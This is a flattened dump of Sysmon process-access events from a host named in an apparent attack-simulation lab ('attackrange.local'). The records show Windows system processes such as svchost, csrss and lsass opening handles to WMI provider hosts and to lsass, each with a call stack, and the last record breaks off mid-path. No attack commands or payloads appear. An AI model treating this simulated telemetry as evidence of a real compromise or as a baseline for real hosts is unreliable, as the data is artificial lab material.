14:55:56.326{B81B27B7-4013-611D-1600-00000000C801}11961040C:\Windows\system32\svchost.exe{B81B27B7-71FC-613B-17B4-03000000C801}2996C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+3ef6a|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341698Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.326{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-71FC-613B-17B4-03000000C801}2996C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341697Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.310{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-71FC-613B-17B4-03000000C801}2996C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035341696Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.310{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-71FC-613B-17B4-03000000C801}2996C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341695Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.294{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341694Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.294{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341693Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.294{B81B27B7-4012-611D-0B00-00000000C801}6361624C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341692Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.273{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-71FC-613B-16B4-03000000C801}2340C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341691Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.273{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-71FC-613B-16B4-03000000C801}2340C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341690Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.273{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-71FC-613B-16B4-03000000C801}2340C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341689Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.273{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-71FC-613B-16B4-03000000C801}2340C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341688Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.273{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-71FC-613B-16B4-03000000C801}2340C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341687Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.273{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-71FC-613B-16B4-03000000C801}2340C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341686Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.257{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-71FC-613B-16B4-03000000C801}2340C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341685Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.257{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-71FC-613B-16B4-03000000C801}2340C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341684Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.257{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-71FC-613B-16B4-03000000C801}2340C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341683Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.257{B81B27B7-4012-611D-0B00-00000000C801}6361624C:\Windows\system32\lsass.exe{B81B27B7-71FC-613B-16B4-03000000C801}2340C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341682Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.257{B81B27B7-4012-611D-0B00-00000000C801}6361624C:\Windows\system32\lsass.exe{B81B27B7-71FC-613B-16B4-03000000C801}2340C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341681Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.257{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341680Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.257{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341679Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.257{B81B27B7-4012-611D-0B00-00000000C801}6361624C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341678Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.210{B81B27B7-4013-611D-1600-00000000C801}11964228C:\Windows\system32\svchost.exe{B81B27B7-71FC-613B-16B4-03000000C801}2340C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+2227|C:\Windows\system32\wbem\wbemcore.dll+13f4|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341677Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.210{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-71FC-613B-16B4-03000000C801}2340C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341676Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.194{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-71FC-613B-16B4-03000000C801}2340C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035341675Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.194{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-71FC-613B-16B4-03000000C801}2340C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\W